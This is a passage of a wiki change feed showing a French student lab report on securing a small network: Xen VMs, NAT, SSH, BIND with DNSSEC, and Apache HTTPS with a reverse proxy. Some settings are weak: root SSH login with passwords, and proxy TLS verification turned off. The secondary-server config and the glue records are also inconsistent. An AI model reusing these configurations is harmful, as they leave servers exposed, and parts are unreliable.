	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Fichier de zone /etc/bind/zones/db.msalhi.online&lt;br /&gt;
$TTL 86400&lt;br /&gt;
@   IN  SOA ns1.msalhi.online. admin.msalhi.online. (&lt;br /&gt;
        2026020320  ; Serial INCRÉMENTÉ et corrigé&lt;br /&gt;
        3600        ; Refresh&lt;br /&gt;
        1800        ; Retry&lt;br /&gt;
        604800      ; Expire&lt;br /&gt;
        86400       ; Minimum TTL&lt;br /&gt;
    )&lt;br /&gt;
&lt;br /&gt;
; Serveurs de noms&lt;br /&gt;
@       IN  NS  ns1.msalhi.online.&lt;br /&gt;
@       IN  NS  ns1.merteuil.tech.&lt;br /&gt;
&lt;br /&gt;
; Enregistrements&lt;br /&gt;
@       IN  A       193.48.57.167&lt;br /&gt;
@       IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
ns1     IN  A       193.48.57.167&lt;br /&gt;
ns1     IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
www     IN  CNAME   msalhi.online.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-secondaire-solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur secondaire (Solstice) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
ls -la /var/lib/bind/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-chez-le-registrar-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration chez le registrar Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNS chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Type'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Description'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Nameservers&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS primaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;|&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.merteuil.tech&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS secondaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 1&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv6: 2001:660:4401:60a0:216:3eff:fe47:bbe7&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 2&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns2.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv4: 193.48.57.167&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-site-web-par-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de site Web par certificat ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;génération-du-csr-et-obtention-du-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Génération du CSR et obtention du certificat ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Génération de la clé privée&lt;br /&gt;
openssl genrsa -out /etc/ssl/private/myserver.key 2048&lt;br /&gt;
&lt;br /&gt;
# Génération du CSR&lt;br /&gt;
openssl req -new -key /etc/ssl/private/myserver.key \&lt;br /&gt;
  -out /etc/ssl/private/server.csr&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-apache-sur-moon-https-direct-ipv6&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration Apache sur Moon (HTTPS direct IPv6) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-ssl.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    DocumentRoot /var/www/html&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    Header always set Strict-Transport-Security &amp;quot;max-age=63072000; includeSubDomains&amp;quot;&lt;br /&gt;
    Header always set X-Frame-Options DENY&lt;br /&gt;
    Header always set X-Content-Type-Options nosniff&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
a2ensite msalhi-ssl.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-proxy-inverse-sur-solstice-https-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-proxy.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
    ProxyPreserveHost On&lt;br /&gt;
    &lt;br /&gt;
    # Utilisation de l'URL avec nom de domaine comme demandé&lt;br /&gt;
    ProxyPass / https://msalhi.online/&lt;br /&gt;
    ProxyPassReverse / https://msalhi.online/&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyVerify none&lt;br /&gt;
    SSLProxyCheckPeerCN off&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/proxy_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation des modules&lt;br /&gt;
a2enmod proxy proxy_http ssl&lt;br /&gt;
a2ensite msalhi-proxy.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-serveur-dns-par-dnssec&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de serveur DNS par DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-dnssec-automatique&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration DNSSEC automatique ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création du répertoire pour les clés&lt;br /&gt;
mkdir -p /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
# Ajout dans named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Politique DNSSEC dans named.conf.options&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
dig @localhost msalhi.online DNSKEY +dnssec&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;résultat-des-clés-dnssec-générées&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Résultat des clés DNSSEC générées ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec&lt;br /&gt;
&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;enregistrement-de-la-ksk-chez-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Enregistrement de la KSK chez Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNSSEC chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Paramètre'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Algorithm&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 13 (ECDSAP256SHA256)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Flags&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 257 (KSK)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Public Key&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12402</id>
		<title>Atelier SysRes SE4 2025/2026 E15</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12402"/>
		<updated>2026-02-25T19:06:12Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Configuration du serveur secondaire (Solstice) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&amp;lt;div class=&amp;quot;titlepage&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Rapport de Projet SE4 IdO&amp;lt;br /&amp;gt;&lt;br /&gt;
Sécurité Système/Réseau'''&lt;br /&gt;
&lt;br /&gt;
'''Année Universitaire 2025-2026'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div class=&amp;quot;figure&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:polytech_logo.png|image]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
'''Étudiant: Mohamed SALHI'''&lt;br /&gt;
&lt;br /&gt;
'''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''&lt;br /&gt;
&lt;br /&gt;
'''Domaine: &amp;lt;code&amp;gt;msalhi.online&amp;lt;/code&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
'''École Polytechnique Universitaire de Lille'''&lt;br /&gt;
&lt;br /&gt;
2026-02-02&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;introduction&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.&lt;br /&gt;
&lt;br /&gt;
L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :&lt;br /&gt;
&lt;br /&gt;
* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs&lt;br /&gt;
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse&lt;br /&gt;
* Une infrastructure réseau redondante avec routeurs Cisco C9200&lt;br /&gt;
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;atelier-système-et-réseau---machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Atelier système et réseau - Machines virtuelles =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;création-des-machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Création des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 &amp;lt;code&amp;gt;capbreton.plil.info&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;commandes-de-création&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Commandes de création ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création de la machine de services SE4.Moon&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
# Création de la machine mandataire SE4.Solstice&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;démarrage-et-connexion&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Démarrage et connexion ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Démarrage des VMs&lt;br /&gt;
xen create /etc/xen/SE4.Moon.cfg&lt;br /&gt;
xen create /etc/xen/SE4.Solstice.cfg&lt;br /&gt;
&lt;br /&gt;
# Connexion aux consoles&lt;br /&gt;
xen console SE4.Moon&lt;br /&gt;
xen console SE4.Solstice&lt;br /&gt;
&lt;br /&gt;
# Liste des VMs actives&lt;br /&gt;
root@capbreton:~# xen list&lt;br /&gt;
Name                                        ID   Mem VCPUs    State   Time(s)&lt;br /&gt;
SE4.Solstice                                39  2048     1     -b----    2560.1&lt;br /&gt;
SE4.Moon                                   119  2048     1     -b----     452.3&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-de-services-se4.moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine de services (SE4.Moon) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;montage-des-partitions-lvm-pour-var-et-home&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Montage des partitions LVM pour /var et /home ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création des fichiers de partition sur le Dom0&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual&lt;br /&gt;
&lt;br /&gt;
# Modification du fichier de configuration Xen&lt;br /&gt;
disk = [&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.home,xvdb,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.var,xvdc,w',&lt;br /&gt;
]&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;formatage-et-montage-des-partitions&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Formatage et montage des partitions ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Formatage des partitions&lt;br /&gt;
mkfs -t ext4 /dev/xvdb&lt;br /&gt;
mkfs -t ext4 /dev/xvdc&lt;br /&gt;
&lt;br /&gt;
# Montage temporaire et copie des données&lt;br /&gt;
mount /dev/xvdc /mnt&lt;br /&gt;
mv /var/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
mount /dev/xvdb /mnt&lt;br /&gt;
mv /home/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
# Configuration du fstab&lt;br /&gt;
cat &amp;gt; /etc/fstab &amp;lt;&amp;lt; EOF&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvdb /home ext4 defaults 0 2&lt;br /&gt;
/dev/xvdc /var ext4 defaults 0 2&lt;br /&gt;
EOF&lt;br /&gt;
&lt;br /&gt;
# Application des modifications&lt;br /&gt;
mount -a&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface réseau privée (vers Solstice)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.2/24&lt;br /&gt;
    gateway 192.168.20.1&lt;br /&gt;
&lt;br /&gt;
# Configuration IPv6 automatique&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Moon:~# ip a show eth0&lt;br /&gt;
2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;installation-des-paquets-de-base&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Installation des paquets de base ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;apt update &amp;amp;&amp;amp; apt upgrade -y&lt;br /&gt;
apt install -y ssh apache2 bind9 bind9utils \&lt;br /&gt;
  fail2ban openssl iptables-persistent \&lt;br /&gt;
  net-tools curl wget vim&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-mandataire-se4.solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine mandataire (SE4.Solstice) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau-1&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface publique (réseau routé)&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.167/27&lt;br /&gt;
    gateway 193.48.57.162  # Adresse VRRP virtuelle&lt;br /&gt;
&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Interface privée (vers Moon)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.1/24&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Solstice:~# ip a show eth1&lt;br /&gt;
3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;mise-en-place-de-la-mascarade-nat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Mise en place de la mascarade (NAT) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Activation du forwarding IP&lt;br /&gt;
echo &amp;quot;net.ipv4.ip_forward=1&amp;quot; &amp;gt;&amp;gt; /etc/sysctl.conf&lt;br /&gt;
sysctl -p&lt;br /&gt;
&lt;br /&gt;
# Règles iptables pour la mascarade&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT&lt;br /&gt;
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde pour persistance&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Ajout dans interfaces pour chargement au démarrage&lt;br /&gt;
post-up iptables-restore &amp;lt; /etc/iptables/rules.v4&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;services-internet&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Services Internet =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-ssh&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur SSH ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-ssh-sur-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration SSH sur Moon ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Édition du fichier de configuration&lt;br /&gt;
vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
# Modifications apportées :&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
PasswordAuthentication yes&lt;br /&gt;
Port 22&lt;br /&gt;
# LogLevel VERBOSE&lt;br /&gt;
&lt;br /&gt;
# Redémarrage du service&lt;br /&gt;
systemctl restart ssh&lt;br /&gt;
systemctl enable ssh&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;redirection-de-ports-pour-laccès-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Redirection de ports pour l’accès IPv4 ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Redirection du port 2201 vers Moon (SSH)&lt;br /&gt;
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \&lt;br /&gt;
  -j DNAT --to-destination 192.168.20.2:22&lt;br /&gt;
&lt;br /&gt;
iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Test de la redirection&lt;br /&gt;
ssh -p 2201 root@193.48.57.167  # Arrive sur Moon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-dns&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-maître-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur maître (Moon) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
